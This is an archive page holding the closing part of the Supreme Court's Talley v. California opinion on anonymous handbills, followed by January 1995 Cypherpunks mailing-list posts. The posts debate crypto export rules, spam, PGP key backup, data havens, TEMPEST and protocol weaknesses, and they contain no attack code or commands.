357 U.S. 449, 462. The reason for those holdings was that identification and fear of reprisal might deter perfectly peaceful discussions of public matters of importance. This broad Los Angeles ordinance is subject to the same infirmity. We hold that it, like the Griffin, Georgia, ordinance, is void on its face. The judgment of the Appellate Department of the Superior Court of the State of California is reversed and the cause is remanded to it for further proceedings not inconsistent with this opinion. It is so ordered. Footnotes n1 Schneider v. State, 308 U.S. 147, 154. Cf. Lovell v. Griffin, 303 U.S. 444, 450. n2 Petitioner also argues here that the ordinance both on its face and as construed and applied "arbitrarily denies petitioner equal protection of the laws in violation of the Due Process and Equal Protection" Clauses of the Fourteenth Amendment. This argument is based on the fact that the ordinance applies to handbills only, and does not include within its proscription books, magazines and newspapers. Our disposition of the case makes it unnecessary to consider this contention. n3 The Court's entire sentence was: "These [pamphlets and leaflets] indeed have been historic weapons in the defense of liberty, as the pamphlets of Thomas Paine and others in our own history abundantly attest." It has been noted that some of Thomas Paine's pamphlets were signed with pseudonyms. See Bleyer, Main Currents in the History of American Journalism (1927), 90-93. Illustrations of other anonymous and pseudonymous pamphlets and other writings used to discuss important public questions can be found in this same volume. n4 Section 28.00 of the Los Angeles Municipal Code defines "handbill" as follows: "'HAND-BILL' shall mean any hand-bill, dodger, commercial advertising circular, folder, booklet, letter, card, pamphlet, sheet, poster, sticker, banner, notice or other written, printed or painted matter calculated to attract attention of the public." n5 Lovell v. Griffin, 303 U.S., at 451. n6 Penry was executed and Udal died as a result of his confinement. 1 Hallam, The Constitutional History of England (1855), 205-206, 232. n7 In one of the letters written May 28, 1770, the author asked the following question about the tea tax imposed on this country, a question which he could hardly have asked but for his anonymity: "What is it then, but an odious, unprofitable exertion of a speculative right, and fixing a badge of slavery upon the Americans, without service to their masters?" 2 Letters of Junius (1821) 39. MR. JUSTICE HARLAN, concurring. In judging the validity of municipal action affecting rights of speech or association protected against invasion by the Fourteenth Amendment, I do not believe that we can escape, as Mr. Justice Roberts said in Schneider v. State, 308 U.S. 147, 161, "the delicate and difficult task" of weighing "the circumstances" and appraising "the substantiality of the reasons advanced in support of the regulation of the free enjoyment of" speech. More recently we have said that state action impinging on free speech and association will not be sustained unless the governmental interest asserted to support such impingement is compelling. See N. A. A. C. P. v. Alabama, 357 U.S. 449, 463, 464; Sweezy v. New Hampshire, 354 U.S. 234, 265 (concurring opinion); see also Bates v. Little Rock, 361 U.S. 516. Here the State says that this ordinance is aimed at the prevention of "fraud, deceit, false advertising, negligent use of words, obscenity, and libel," in that it will aid in the detection of those responsible for spreading material of that character. But the ordinance is not so limited, and I think it will not do for the State simply to say that the circulation of all anonymous handbills must be suppressed in order to identify the distributors of those that may be of an obnoxious character. In the absence of a more substantial showing as to Los Angeles' actual experience with the distribution of obnoxious handbills, * such a generality is for me too remote to furnish a constitutionally acceptable justification for the deterrent effect on free speech which this all-embracing ordinance is likely to have. On these grounds I concur in the judgment of the Court. Footnotes: * On the oral argument the City Attorney stated: "We were able to find out that prior to 1931 an effort was made by the local Chamber of Commerce, urging the City Council to do something about these handbills and advertising matters which were false and misleading -- had no names of sponsors. They were particularly interested in the fictitious name. They said, 'Who are these people that are distributing; who are advertising; doing things of that sort?' The meager record that we were able to find indicates that a request from the Council to the City Attorney as to their legal opinion on this subject [sic]. The City Attorney wrote back and formed the conclusion that distribution of handbills, pamphlets, or other matters, without the name of the fictitious firm or officers would be legal [sic]. Thereafter in the early part of 1932 an ordinance was drafted, and submitted to the City Council, and approved by them, which related to the original subject -- unlawful for any person, firm or association to distribute in the city of Los Angeles any advertisement or handbill -- or any other matter which does not have the names of the sponsors of such literature." MR. JUSTICE CLARK, whom MR. JUSTICE FRANKFURTER and MR. JUSTICE WHITTAKER join, dissenting. To me, Los Angeles' ordinance cannot be read as being void on its face. Certainly a fair reading of it does not permit a conclusion that it prohibits the distribution of handbills "of any kind at any time, at any place, and in any manner," Lovell v. Griffin, 303 U.S. 444, 451 (1938), as the Court seems to conclude. In Griffin, the ordinance completely prohibited the unlicensed distribution of any handbills. As I read it, the ordinance here merely prohibits the distribution of a handbill which does not carry the identification of the name of the person who "printed, wrote, compiled . . . manufactured [or] . . . caused" the distribution of it. There could well be a compelling reason for such a requirement. The Court implies as much when it observes that Los Angeles has not "referred to any legislative history indicating" that the ordinance was adopted for the purpose of preventing "fraud, false advertising and libel." But even as to its legislative background there is pertinent material which the Court overlooks. At oral argument, the City's chief law enforcement officer stated that the ordinance was originally suggested in 1931 by the Los Angeles Chamber of Commerce in a complaint to the City Council urging it to "do something about these handbills and advertising matters which were false and misleading." Upon inquiry by the Council, he said, the matter was referred to his office, and the Council was advised that such an ordinance as the present one would be valid. He further stated that this ordinance, relating to the original inquiry of the Chamber of Commerce, was thereafter drafted and submitted to the Council. It was adopted in 1932. In the face of this and the presumption of validity that the ordinance enjoys, the Court nevertheless strikes it down, stating that it "falls precisely under the ban of our prior cases." This cannot follow, for in each of the three cases cited, the ordinances either "forbade any distribution of literature . . . without a license," Lovell v. Griffin, supra, or forbade, without exception, any distribution of handbills on the streets, Jamison v. Texas, 318 U.S. 413 (1943); or, as in Schneider v. State, 308 U.S. 147 (1939), which covered different ordinances in four cities, they were either outright bans or prior restraints upon the distribution of handbills. I, therefore, cannot see how the Court can conclude that the Los Angeles ordinance here "falls precisely" under any of these cases. On the contrary, to my mind, they neither control this case nor are apposite to it. In fact, in Schneider, depended upon by the Court, it was held, through Mr. Justice Roberts, that, "In every case . . . where legislative abridgment of the rights is asserted, the courts should be astute to examine the effect of the challenged legislation . . . weigh the circumstances and . . . appraise the substantiality of the reasons advanced . . . ." Id., at 161. The Court here, however, makes no appraisal of the circumstances, or the substantiality of the claims of the litigants, but strikes down the ordinance as being "void on its face." I cannot be a party to using such a device as an escape from the requirements of our cases, the latest of which was handed down only last month. Bates v. Little Rock, 361 U.S. 516. n1 Therefore, before passing upon the validity of the ordinance, I would weigh the interests of the public in its enforcement against the claimed right of Talley. The record is barren of any claim, much less proof, that he will suffer any injury whatever by identifying the handbill with his name. Unlike N. A. A. C. P. v. Alabama, 357 U.S. 449 (1958), which is relied upon, there is neither allegation nor proof that Talley or any group sponsoring him would suffer "economic reprisal, loss of employment, threat of physical coercion [or] other manifestations of public hostility." Id., at 462. Talley makes no showing whatever to support his contention that a restraint upon his freedom of speech will result from the enforcement of the ordinance. The existence of such a restraint is necessary before we can strike the ordinance down. But even if the State had this burden, which it does not, the substantiality of Los Angeles' interest in the enforcement of the ordinance sustains its validity. Its chief law enforcement officer says that the enforcement of the ordinance prevents "fraud, deceit, false advertising, negligent use of words, obscenity, and libel," and, as we have said, that such was its purpose. In the absence of any showing to the contrary by Talley, this appears to me entirely sufficient. I stand second to none in supporting Talley's right of free speech -- but not his freedom of anonymity. The Constitution says nothing about freedom of anonymous speech. In fact, this Court has approved laws requiring no less than Los Angeles' ordinance. I submit that they control this case and require its approval under the attack made here. First, Lewis Publishing Co. v. Morgan, 229 U.S. 288 (1913), upheld an Act of Congress requiring any newspaper using the second-class mails to publish the names of its editor, publisher, owner, and stockholders. 39 U. S. C. @ 233. Second, in the Federal Regulation of Lobbying Act, 2 U. S. C. @ 267, Congress requires those engaged in lobbying to divulge their identities and give "a modicum of information" to Congress. United States v. Harriss, 347 U.S. 612, 625 (1954). Third, the several States have corrupt practices acts outlawing, inter alia, the distribution of anonymous publications with reference to political candidates. n2 While these statutes are leveled at political campaign and election practices, the underlying ground sustaining their validity applies with equal force here. No civil right has a greater claim to constitutional protection or calls for more rigorous safeguarding than voting rights. In this area the danger of coercion and reprisals -- economic and otherwise -- is a matter of common knowledge. Yet these statutes, disallowing anonymity in promoting one's views in election campaigns, have expressed the overwhelming public policy of the Nation. Nevertheless the Court is silent about this impressive authority relevant to the disposition of this case. All three of the types of statutes mentioned are designed to prevent the same abuses -- libel, slander, false accusations, etc. The fact that some of these statutes are aimed at elections, lobbying, and the mails makes their restraint no more palatable, nor the abuses they prevent less deleterious to the public interest, than the present ordinance. All that Los Angeles requires is that one who exercises his right of free speech through writing or distributing handbills identify himself just as does one who speaks from the platform. The ordinance makes for the responsibility in writing that is present in public utterance. When and if the application of such an ordinance in a given case encroaches on First Amendment freedoms, then will be soon enough to strike that application down. But no such restraint has been shown here. After all, the public has some rights against which the enforcement of freedom of speech would be "harsh and arbitrary in itself." Kovacs v. Cooper, 336 U.S. 77, 88 (1949). We have upheld complete proscription of uninvited door-to-door canvassing as an invasion of privacy. Breard v. Alexandria, 341 U.S. 622 (1951). Is this less restrictive than complete freedom of distribution -- regardless of content -- of a signed handbill? And commercial handbills may be declared verboten, Valentine v. Chrestensen, 316 U.S. 52 (1942), regardless of content or identification. Is Talley's anonymous handbill, designed to destroy the business of a commercial establishment, passed out at its very front door, and attacking its then lawful commercial practices, more comportable with First Amendment freedoms? I think not. Before we may expect international responsibility among nations, might not it be well to require individual responsibility at home? Los Angeles' ordinance does no more. Contrary to petitioner's contention, the ordinance as applied does not arbitrarily deprive him of equal protection of the law. He complains that handbills are singled out, while other printed media -- books, magazines, and newspapers -- remain unrestrained. However, "the problem of legislative classification is a perennial one, admitting of no doctrinaire definition. Evils in the same field may be of different dimensions and proportions, requiring different remedies. . . . Or the reform may take one step at a time, addressing itself to the phase of the problem which seems most acute to the legislative mind. . . . The prohibition of the Equal Protection Clause goes no further than the invidious discrimination. [I] cannot say that that point has been reached here." Williamson v. Lee Optical Co., 348 U.S. 483, 489 (1955). I dissent. Footnotes n1 "When it is shown that state action threatens significantly to impinge upon constitutionally protected freedom it becomes the duty of this Court to determine whether the action bears a reasonable relationship to the achievement of the governmental purpose asserted as its justification." 361 U.S., at 525. n2 Thirty-six States have statutes prohibiting the anonymous distribution of materials relating to elections. E. g.: Kan. Gen. Stat., 1949, @ 25-1714; Minn. Stat. Ann. @ 211.08; Page's Ohio Rev. Code Ann. @ 3599.09; Purdon's Pa. Stat. Ann., Title 25, @ 3546. _________________________________________________________________________ David Banisar (Banisar at epic.org) * 202-544-9240 (tel) Electronic Privacy Information Center * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * ftp/gopher/wais cpsr.org Washington, DC 20003 * HTTP://epic.digicash.com/epic From kipp at warp.mcom.com Wed Jan 18 08:52:33 1995 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Wed, 18 Jan 95 08:52:33 PST Subject: 40bit Encryption : Adequate or sadly lacking ? In-Reply-To: <199501181321.HAA04672@pentagon.io.com> Message-ID: <9501180839.ZM8045@warp.mcom.com> On Jan 18, 7:21am, Duncan wrote: > Subject: Re: 40bit Encryption : Adequate or sadly lacking ? > > >> Marc, isn't it possible (legally) to deliver products with a replaceble > >> encryption library (dll). Delivery with a 40-bit key DLL. The user has > >> the option to install a dll with a different keysize. Somewhat like > >> winsock.... > > > > > >Actually, it's probably worse than you think: > > > >There are govt's out there that won't let you import code that is > >"encryption ready". You must prove that your software is tamper proof > >before it can be imported, and tamper proofing means that you can't > >bolt on security. Also, I believe the export laws disallow "plug in" > >security in the US... > > > >The crypto legal world sucks. > > Could you clarify the export restriction on "plug and play" encryption ready > products? I am about to embark on a project that I want to be distributed > freely that would be designed around a generic encryption intereface that I > would wrap around a real encryption core such as PGP,etc. I wanted to include a > BS encryption in the freely distributable package to prevent export woes. The > project is in design stages now and I don't need this additional headache. Contact a lawyer. It's *really* complicated, and I'm not a lawyer so anything I tell you could be wrong in some important way, and then you would get really angry if the govt started chewing you to pieces. -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://home.mcom.com/people/kipp/index.html From jalicqui at prairienet.org Wed Jan 18 09:21:49 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Wed, 18 Jan 95 09:21:49 PST Subject: (none) Message-ID: <9501181721.AA13078@firefly.prairienet.org> Eric wrote: > From: jalicqui at prairienet.org (Jeff Licquia) > > I'm sure that when your hypothetical remailer comes up and I decide to spam > you with your own words (now I wouldn't do that, now would I? ;-), your > sysadmin will be comforted by knowing that it's only ones and zeros filling > his hard disk. > >Why sendmail doesn't have anti-spam protection at this point is beyond >me. Denial of email service to one user should not deny service to >all others. I consider broken any email system that crashes a machine >because of a disk partition filling. Yes, this is true. Even if it didn't crash the system, however, it could have the effect of disabling mail service, either to all users on the system or to the particular user being spammed (depending on the robustness of the system). Though it's not as likely to anger the sysadmin, it is more likely to anger the spamee. More to the point, if the spammer uses random anonymous remailers to protect his/her identity, there's no good way to prevent this attack short of installing a filter of some kind or refusing mail from remailers. If no one will accept mail from the anon remailers, what good are they? >When your email provider gave you an account, was there an agreement >as to how much mail you could receive? If there wasn't, that provider >has no good reason to complain if you receive as much email as >possible. Merely because some else decided to send it to you does not >relieve a provider who has agreed to deliver all mail of that >obligation. I though most usage agreements had something in them about reasonable limits and such. On that basis, a provider could choose to auto-kill spam if they thought it "unreasonable". This of course assumes that providers always abide by well-defined rules and are not arbitrary in any way. :-) {As to my personal situation, since you asked: Prairienet has quotas.) > In the real world, however, there will > always be problems with "acceptable use" and "abuse", along with the > additional problems with establishing policy and so on. > >"Acceptable use" is shorthand for "It's a little rickety, please don't >play hard." That is, the technical means to limit the consequences of >abuse were not developed, because everyone was willing to play nice. >This doesn't scale, and it will have to be fixed before everyone will >put their home computer directly on the net. It's been my experience up to this point that for each security safeguard put in place, there will be someone somewhere that will find a way to breach it. Perhaps strong crypto will serve to end that trend; I doubt it, though, due to the horrid legal situation. Thus I doubt that written, human-enforced policy will disappear anytime soon. Not an ideal situation, I must admit. From jalicqui at prairienet.org Wed Jan 18 09:41:44 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Wed, 18 Jan 95 09:41:44 PST Subject: EE Times on PRZ Message-ID: <9501181741.AA20208@firefly.prairienet.org> Hal wrote: >This, from a sidebar, is really surprising: "In contrast, public keys >allow the overt publication of an encryption key, because decryption keys >can only be derived through a mathematically difficult process, such as >large prime-number factoring. Contrary to popular belief, the NSA can >decrypt public keys of most practical key sizes." I wonder what this >means? If it is a claim that the NSA can factor 1024 bit moduli that >would certainly come as a big surprise. If they are saying that they can >do 512 bits that would be more believable although of interest. It is >strange that the author would include a statement like this without >attribution or evidence. Another quote from the article posted elsewhere said that, "PGP, which is based on the Diffie-Hellman public-key technology developed in the 1970s..." This is technically true, since all public-key work (including RSA) is based to some extent on DH. It could be, however, that the author is confusing public-key technology with Diffie-Hellman public-key in particular, which (as I understand it) is not particularly secure. From dcwill at ee.unr.edu Wed Jan 18 09:49:27 1995 From: dcwill at ee.unr.edu (Dr. D.C. Williams) Date: Wed, 18 Jan 95 09:49:27 PST Subject: Key backup (was: How do I know . ..) Message-ID: <199501181754.MAA24686@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- 'Eric Hughes' was reported to have written: > You use your friends now because off-site storage facilities are not > yet available. The software for distributed remote backup has yet to > make this operation transparent. Even when such a system becomes available, I don't think that it will obviate the need for relatively secure on-site storage. Banks and safe deposit boxes haven't completely precluded the demand for safes at home. Many people don't trust banks. Fewer will completely trust cypherbanks and distributed.net.storage systems. > I suspect that most private keys in the future will be held in PCMCIA > cards (initially) and then their smaller replacements. Backing up a > private key to these allows use of a safe deposit box. Safe deposit boxes, by virtue of their accessibility to law enforcement, are subject to search and seizure under court order and are sealed in certain cases (probate). This makes them likely to be the first place to look when the Feds decide that we can't have keys anymore. Personally speaking, I'll take my chances with secure "on-site" storage, even if I choose a location other than my own home or business. > If it's still "passphrase-protected", an attacker would a) have to know > what to look for > For scalability, most people will use some standard method, whatever > it is. This limits the search space of an opponent. If barcoding is our example, what's to prevent it from being printed in a format selected by the user? Printing on a small paper/plastic label and affixng it (in whole or in parts) to other objects effectively disguises it as a UPC label. You would have to know which labels are a part of a keyring for them to have any significance. Even George Bush now knows that every commercial product has a UPC on it somewhere. Many stores add their own UPC sticker to merchandise for inventory control purposes. Break a keyring into 4 or 5 pieces (whatever it takes to make each piece comparable in size and appearance to the standard UPC label), stick them on selected objects, and let someone who knows what they're looking for try and reconstruct your keyring from the universe of combinations of UPC labels found around your home. With an unknown number of parts, this seems like a practically insurmountable problem. This becomes a stego problem as well as a key decryption problem. With barcoding as the standard, another person prints his key on a small unmarked card and hides it somewhere deemed to be secure by him. The UPC-label attack fails because his keyring isn't disguised as UPC product labels. How does the attacker know what to look for? True Paranoids could devise some sort of "invisible ink" method, requiring UV or heat exposure before the barcode becomes visible. Now your backup key looks like a blank sheet of paper. ;-) My point is that with a regular barcode-generation program and a laser printer, an infinite number of formats and combinations can be created by individual users to suit their needs. You can print an 8.5 x 11 sheet with the title "PGP secret keyring" and put it in a frame hung on the wall, or you can print a bunch of split key pseudo-UPC labels and put one on the back of the frame to disguise it as the manufacturer's product label. One method is secure and the other is not, but the specifics are left to the user because the method is sufficiently flexible to allow a number of formats. I contend that anyone capable of running PGP properly is also capable of using a barcode printing program without difficulty (check out the back of PC Magazine). All that would need to be written is a short routine to convert the encrypted keyring into a format suitable as input for a program of this nature. Heck, there's probably a PD barcode program out there already. My question to the respected elders of this list is "how or why is this type of key backup system insecure, if it is in fact insecure?" =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLx1VlyoZzwIn1bdtAQFT5QF+N2RGEpj37fT0iCUnPdnkaUWItbC+HHAj eFAyBU7fNOnHGwiriHnuEcYaZxBV6lst =l3PL -----END PGP SIGNATURE----- From shamrock at netcom.com Wed Jan 18 10:00:06 1995 From: shamrock at netcom.com (Lucky Green) Date: Wed, 18 Jan 95 10:00:06 PST Subject: What is this? Anonymous message failed Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Just got back a message from Julf's remailer that my Anonymous message failed (wrong password). Needless to say, I didn't try to send one through the remailer. The message it was refering to is the one I sent to the list earlier. Is this a repeat of the an/na problems we had in the past? Confused, - --Lucky -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Not-the-Real MacPGPv262 iQCVAwUBLxzKlQSQkem38rwFAQGaYAP+MGfUN1Vv7SWR2WX0i/XYCYbwOVPTYj1v Bkld6/rbrzW1SZ+nriQe1OP/ktuoTG5vO281brfIdNA4SQPK6MGf7JdU4AiXL/dQ UE/nuE+UN60jL1leZngG717QBUTUetfj8npilfgv74EE0QDlStItP+MntrMspl6D goePQCSfe5Q= =69Tv -----END PGP SIGNATURE----- From beattie at CSOS.ORST.EDU Wed Jan 18 10:17:09 1995 From: beattie at CSOS.ORST.EDU (Brian Beattie) Date: Wed, 18 Jan 95 10:17:09 PST Subject: (none) In-Reply-To: <199501181554.HAA08177@largo.remailer.net> Message-ID: On Wed, 18 Jan 1995, Eric Hughes wrote: > From: Brian Beattie > > I disagree, one can use e-mail to steal. E-mail consumes resources, > resources for which the sender may have no right to use. > > It's not theft if there's no direct benefit to the actor. It does I must assume that the actor who spams me or sends me unsolicited email or any email for that matter derives some benifit from this activity or they would not do it. > consume resources, there's no argument about that. Note, however, > that the scope of any such resource use is with the message as a bit > sequence; no meaning or interpretation of the content is even > relevant. That is, the resource use does not relate to the email as > communication, merely as a technical operation. If I make it clear that I do not wish to receive email from an individual or group and that individual or group continues to send email then I contend that they are using my resources in a way that I have not authorized. > > The question remains whether such resource use can ever be considered > unauthorized. Certainly it's impolite; that's not at issue. > > I argue that if you hook your machine up to the Internet, you've > implicitly authorized people to send you packets -- as many as they > want and of whatever nature as they want. clearly I disagree. Brian Beattie | [From an MIT job ad] "Applicants must also have | extensive knowledge of UNIX, although they should beattie at csos.orst.edu | have sufficently good programming taste to not Fax (503)754-3406 | consider this an achievement." From jamesd at netcom.com Wed Jan 18 10:42:27 1995 From: jamesd at netcom.com (James A. Donald) Date: Wed, 18 Jan 95 10:42:27 PST Subject: 40bit Encryption : Adequate or sadly lacking ? In-Reply-To: <199501181321.HAA04672@pentagon.io.com> Message-ID: > There are govt's out there that won't let you import code that is > "encryption ready". You must prove that your software is tamper proof > before it can be imported, and tamper proofing means that you can't > bolt on security. Also, I believe the export laws disallow "plug in" > security in the US... Central point software faced this problem. So they made the encryption features of their product a free add on, and posted it on bulleting boards with instructions not to download unless you were an American citizen. Needless to say these instructions were ignored, surprise surprise. Of course this strategy only works if your product is useful without encryption, and the add on is of limited use without your product. I believe that Kevin Welch decided on this strategy. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from James A. Donald the arbitrary power of the omnipotent state. jamesd at netcom.com http://www.catalog.com/jamesd/ From strick at versant.com Wed Jan 18 10:47:11 1995 From: strick at versant.com (strick -- henry strickland) Date: Wed, 18 Jan 95 10:47:11 PST Subject: EE Times on PRZ In-Reply-To: <9501181741.AA20208@firefly.prairienet.org> Message-ID: <9501181850.AA25257@versant.com> THUS SPAKE jalicqui at prairienet.org (Jeff Licquia): # Hal wrote: # >large prime-number factoring. Contrary to popular belief, the NSA can # >decrypt public keys of most practical key sizes." I wonder what this # >means? Just as healthy paranoia, that's worth persuing. But I bet the author didn't know what they was talking about. # Another quote from the article posted elsewhere said that, "PGP, which is # based on the Diffie-Hellman public-key technology developed in the 1970s..." # This is technically true, since all public-key work (including RSA) is based # to some extent on DH. It could be, however, that the author is confusing DH uses "discrete log" as the hard problem, and very straightforward mathematics. RSA uses "factoring" as the hard problem, and a very clever back door. How do you decide if one is based on the other? # public-key technology with Diffie-Hellman public-key in particular, which # (as I understand it) is not particularly secure. It's still up in the air, isn't it, whether the discrete log or factoring is the harder to crack. My intuition is they're the same hard. I know of no problem with DH that RSA doesn't have similar problems. strick From jamesd at netcom.com Wed Jan 18 11:12:04 1995 From: jamesd at netcom.com (James A. Donald) Date: Wed, 18 Jan 95 11:12:04 PST Subject: (none) In-Reply-To: <9501181603.AA01635@snark.imsi.com> Message-ID: Eric Hughes says: > > I argue that if you hook your machine up to the Internet, you've > > implicitly authorized people to send you packets -- as many as they > > want and of whatever nature as they want. No service provision I've > > ever seen gives any recourse to the end user against the provider for > > "bad" packets. On Wed, 18 Jan 1995, Perry E. Metzger wrote: > Be that as it may, people HAVE been kicked off for mischief like > forging routing packets -- and if someone started hosing me down with > any one of several really nasty packet based attacks I'm familiar with > I would expect action to be taken against them. Unix is broken. Windows and DOS are fragile and under construction. Servers should have built in limits, that cause them to spit back packets from unknown clients that are unreasonable or strain the system. For example an SMTP server should have a default limit on volume per address and per client, with the user being able to vary such limits for particular clients or addresses -- trusted or hostile clients. At present most unix utilities have arbitrary fixed length internal buffers for processing variable length fields. If you overflow the buffer by sending pathological data you will crash the system. If you know machine code, and you overflow the buffer with carefully chosen data then instead of a random crash you can get the server to do some particular unexpected thing -- for example the internet worm caused the server to execute a file that the mail server had just received. This is one of many bugs that make attacks possible. This is a bug. It can and regularly does crash your system and cause loss of data even if nobody attacks. Every flaw in the system causes more havoc by accident than it does by malice. The correct solution is not to create institutions capable of dealing effectively with hostile acts. The big problem is bugs that urgently need fixing. Now even if all the bugs were fixed some really evil packet based attacks are still possible, in which case social action -- cutting the connectivity of a host that generates bad packets -- is still necessary, but again bad packets are more common by malfunction than by malice. > I doubt it. It really hasn't proved to be an actual problem thus > far. If anything, the limiting factor on scalability is the fact that > the net has no locality of reference, which is making routing design > harder and harder. Routing is currently THE big unsolved problem on > the net -- something outsiders to the IETF rarely suspect, because the > engineers have been faking it so well for so long. Unfortunately, all > the good solutions to the routing problem are mathematically > intractable -- and the practical ones are leading to bad potential > long term problems.. This is inaccurate. Optimal solutions to the routing problem are mathematically intractable. Tolerable solutions are mathematically tractable. For realistic routing problems, tractable approximations are only worse than an optimal solution by a modest factor. There are real world problems where tractable approximations are not good enough, but routing is not one of them. Of course I am sure Perry is correct when he says that the tractable approximations that we are currently using fail to scale, but this is not a fundamental unsolved problem in mathematics -- it is merely yet another bug. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from James A. Donald the arbitrary power of the omnipotent state. jamesd at netcom.com http://www.catalog.com/jamesd/ From tcmay at netcom.com Wed Jan 18 11:17:31 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 18 Jan 95 11:17:31 PST Subject: TEMPEST In-Reply-To: <199501181520.AB24570@mail.eskimo.com> Message-ID: <199501181916.LAA09619@netcom12.netcom.com> Joel McNamara wrote: > The Cyphernomicon talks about a proposed, early Cypherpunk project that > dealt with TEMPEST/VanEck monitoring. Did anyone carry this out beyond the > idea stage? All I ever seem to see is "theory" and "hear-say" on this topic > (and the original VanEck article appears dated and incomplete). We all need to remember that projects are not "proposed" and then "assigned." That is, projects only get done when someone decides to personally champion that project. I'm sure this is obvious, but maybe not. The TEMPEST thread comes up now and then, but nobody (at least to my knowledge) has gotten interested enough to pursue it. Before anyone ever asks why _others_ are not doing work in this area, they should look to themselves. (Not meant to be a critical remark directed at Joel, just a general comment that the only things that get done are the things that get done.) > I noticed the Consumertronics (John Williams in Alamogordo, New Mexico) > catalog has an assembled device that will work with EGA to SVGA monitors. > $3,995 seems a bit pricey though (or is it). Has anyone had dealings with > Consumertronics in the past? TEMPEST has very little to do with Cypherpunks goals, actually. First, buying such a gadget, tweaking it, exploring capabilities, etc., would lead to what? The ability to park a van in front of someone's house and--maybe--monitor their screens? We already know this is possible. (You all knew that, didn't you?) I'm not saying it wouldn't be useful to have someone on our list who has a lot of experience in this area, but mainly just for the "background" it would provide. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From entropy at IntNet.net Wed Jan 18 11:26:02 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 18 Jan 95 11:26:02 PST Subject: [ DH Code ] In-Reply-To: Message-ID: > Are there implemented DH codes running around anywhere? DH code is easy - using PGP and perl you can build a simple one in a matter of hours. But: where's the market? The only people I've ever known to need a 'data haven' were a group of people who'd obtained the source code to a major commercial operating system and used a freenet account and ftp to transfer it. (40 mB+, I gather). I can see building one - it doesn't seem at all difficult. But I don't see how I could be reimbursed for the disk space and bandwidth. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From entropy at IntNet.net Wed Jan 18 11:33:16 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 18 Jan 95 11:33:16 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: > I could write a procmail recipe and a script in about an hour to > automatically secret-share-split and redistribute the incoming submission. I'll wager most of us could. Question: whom would you redistribute it _TO_? This seems to be the stumbling block - who is willing to store the data on their machine or net account? Speaking as someone with about 300k of quota left, it certainly couldn't be me, though I'd be willing to handle the frontend interfacing work. How would you handle retrieval of the data? > If the authorities attempt to indict you for possessing illegal > information / kiddie porn / whatnot, they have to prove that you > interfered with the automatic redistribution process and examined the > contents of the submission. If you in fact did not look at the submission, > they would have a difficult time doing so. Unfortunately I've found that the U.S. government especially can make your life a living hell if you don't go along with their desires, even if you're following all the laws. Trumped-up charges. Fake charges. I wouldn't put much past our government. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From perry at imsi.com Wed Jan 18 11:34:29 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 18 Jan 95 11:34:29 PST Subject: (none) In-Reply-To: Message-ID: <9501181934.AA02176@snark.imsi.com> "James A. Donald" says: > On Wed, 18 Jan 1995, Perry E. Metzger wrote: > > Be that as it may, people HAVE been kicked off for mischief like > > forging routing packets -- and if someone started hosing me down with > > any one of several really nasty packet based attacks I'm familiar with > > I would expect action to be taken against them. > > Unix is broken. Windows and DOS are fragile and under construction. This has nothing to do with Unix, Mr. Donald. This has to do with the nature of internet protocols. > Servers should have built in limits, that cause them to spit back > packets from unknown clients that are unreasonable or strain the > system. Can't be done. Sorry. There are certain flaws in the design of the internet protocols down on the transport layer that I'd rather not get into because they don't seem to be widely known and I'm not interested in making them better known. > For example an SMTP server should have a default limit on volume > per address and per client, with the user being able to vary > such limits for particular clients or addresses -- trusted or > hostile clients. Sendmail already has such limits. Unfortunately they ultimately do no good. I'd try explaining, but the details get too technical -- if people insist I'll get into it. The gist is, however, that in the current network its too easy to fake connections. Even with per client limits I could still make your machine die a horrible death. > At present most unix utilities have arbitrary fixed length internal > buffers for processing variable length fields. If you overflow > the buffer by sending pathological data you will crash the system. Not usually, actually. The "utilities" have nothing to do with the kernel, and the kernel is what can crash the machine. > If you know machine code, and you overflow the buffer with > carefully chosen data then instead of a random crash you can > get the server to do some particular unexpected thing -- for > example the internet worm caused the server to execute a > file that the mail server had just received. Those sorts of security problems are not only well known but largely gone. The last one, in sendmail's debug flag, could only hurt a machine by action of a user on the machine itself, not over the network. The sorts of things I'm talking about are *inherent* in the design of TCP and cannot be altered at this point. > > I doubt it. It really hasn't proved to be an actual problem thus > > far. If anything, the limiting factor on scalability is the fact that > > the net has no locality of reference, which is making routing design > > harder and harder. Routing is currently THE big unsolved problem on > > the net -- something outsiders to the IETF rarely suspect, because the > > engineers have been faking it so well for so long. Unfortunately, all > > the good solutions to the routing problem are mathematically > > intractable -- and the practical ones are leading to bad potential > > long term problems.. > > This is inaccurate. Optimal 